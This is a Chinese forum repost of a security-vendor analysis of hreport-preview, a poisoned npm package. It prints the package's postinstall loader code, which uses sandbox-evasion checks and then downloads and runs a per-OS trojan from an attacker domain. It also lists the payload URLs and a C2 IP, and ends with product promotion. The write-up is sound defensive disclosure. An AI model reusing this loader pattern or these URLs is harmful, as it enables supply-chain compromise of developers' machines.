安全矩阵

 找回密码
 立即注册
搜索
查看: 751|回复: 0

中路对线发现正在攻防演练中投毒的红队大佬

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-8-18 13:01:38 | 显示全部楼层 |阅读模式
墨菲安全实验室 [url=]墨菲安全实验室[/url] 2023-08-1809:00 发表于北京
背景

2023年8月14日晚,墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM投毒事件分析文章,紧接着我们在8月17日监控到一个新的npm投毒组件包 hreport-preview,该投毒组件用来下载木马文件的域名地址竟然是img.murphysec-nb.love(如下图1),且该域名注册时间就是8月14号,投毒者使用的注册邮箱同样是hotmail临时注册的邮箱,很显然大概是上次被我们公开投毒行为的攻击者正在火速赶往中路与我们对线,大哥,速度要不要这么快 -_-!

图1:whois查询

当天中午,我们还收到位于大洋彼岸漂亮国科罗拉多州、同样关注此事的软件供应链安全创业公司phylum.io CTO Louis来信(见图2),询问该投毒组件是否是我们所为,很是尴尬。


图2:phylum来信询问投毒包情况

投毒事件分析

8月17日上午7点,墨菲安全实验室监控到用户 rowebrighttix(邮箱:Rowe_Brighttix@hotmail.com)向NPM上传了携带远控木马的NPM组件包 hreport-preview(见图3)。

图3: NPM仓库 hreport-preview 组件包

Readme中标题为Integrate common functions(集成公共功能) ,而下方列举的常用函数名来自于一篇中文文章(见图4),因此投毒者大概率有中文背景。

图4:《56个JavaScript实用工具函数助你提升开发效率!》文章中提及相关函数名

代码分析

当用户安装组件包时会执行 package.json 中的postinstall 语句 node index.js,进而针对Windows/Mac/Linux系统分别从以下网址下载恶意木马,该木马会与投毒者的C2服务器(如:152.195.38.76)建立远程连接,进而执行恶意命令、上传/下载文件等操作,疑似被攻防演练的红队所利用:


  • https://img.murphysec-nb.love/w_x32.exe
  • https://img.murphysec-nb.love/m_arm
  • https://img.murphysec-nb.love/l_x64
  1. //index.js 下载恶意木马
  2. //......

  3. function check(){
  4.     (async () => {
  5.         const result = await getip();
  6.         if (result){
  7.             let status = false;
  8.             let donwoload = ""
  9.             const platform = os.platform();
  10.             const arch = os.arch();

  11.             if (platform === 'win32') {

  12.                 if (uptimeMinutes.toFixed(2) > 10){
  13.                     donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"
  14.                     status = true
  15.                 }

  16.             } else if (platform === 'darwin') {

  17.                 if (uptimeMinutes.toFixed(2) > 10){
  18.                     donwoload="https://img.murphysec-nb.love/"+"m_"+arch
  19.                     status = true
  20.                 }
  21.             } else if (platform === 'linux') {

  22.                 donwoload="https://img.murphysec-nb.love/"+"l_"+arch
  23.                 await (async () => {
  24.                     const result = await checkCgroup();
  25.                     if (result) {
  26.                         status = true
  27.                     } else {
  28.                         if (uptimeMinutes.toFixed(2) > 10){
  29.                             status = true
  30.                         }
  31.                     }
  32.                 })();
  33.             } else {
  34.                 return

  35.             }

  36.             if(status) {

  37.                 await (async () => {
  38.                     const result = await downloadAndSaveFile(donwoload);
  39.                     if (result !=null){
  40.                         if (platform === 'linux' ||platform === 'darwin' ){
  41.                             addExecutablePermission(result)
  42.                         }
  43.                         runInBackground(result)

  44.                     }

  45.                 })();
  46.             }else {
  47.                 process.exit(0);
  48.             }
  49.         }
  50.     })();

  51. }
复制代码


IOC


参考链接


  • https://mp.weixin.qq.com/s/_bYduwlqMT3P5xQbtwg3FA
  • https://www.npmjs.com/package/hreport-preview
  • https://juejin.cn/post/7019090370814279693

排查工具及投毒情报

墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截,同时支持对高危漏洞实现基线管理,目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警,所有情报经过严格的安全专家研判,保障企业获取的第一手的高质量漏洞及投毒情报,更有比CVE漏洞库多25+额外的详细分析字段,目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。



以上功能企业可通过以下方式申请试用:

一、长按二维码申请:

二、访问申请链接:
https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 14:38 , Processed in 0.012951 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表